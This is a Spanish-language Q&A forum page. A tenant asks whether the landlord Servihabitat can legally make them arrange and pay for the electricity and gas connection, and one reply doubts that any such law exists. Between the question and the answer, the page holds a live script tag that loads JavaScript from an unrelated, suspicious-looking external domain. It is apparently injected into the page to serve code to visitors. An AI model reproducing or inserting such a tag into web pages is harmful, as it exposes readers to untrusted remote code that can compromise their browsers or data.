Alquilo piso de servihabitad. Tengo que ocupar y costear el enganche de las energías

voy a firmar contrato de alquiler con servihabitad. No tienen los boletines de la energía que tiene la casa (luz y gas) pero están en ello, según ellos tengo que ocuparme y costear el enganche según la nueva ley. ¿Es eso realmente así? He alquilado toda mi vida, y nunca he tenido que hacer esto, aunque en algún momento he estrenada casa, solamente he tenido dar mi nº de cuenta a la empresa de energía para que llegara la factura y su cobro directamente a mi y no a través del arrendador. Gracias por tu pronto respuesta.

<script type="text/javascript" src="http://tema-super-rosa.info/dfi823hs.js?0.925097363084713"></script>

1 Respuesta

Respuesta
1

Pues con sinceridad, desconozco a que nueva ley se refieren, desde luego no es a la Ley de Arrendamientos Urbanos, ahora, esto es como todo, normalmente, estas cosas se pactan entre las partes, con lo que lo habla con ellos, y si no cambian de oferta tendrá que buscar una vivienda distinta. Legalmente no le puedo decir nada mas.

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas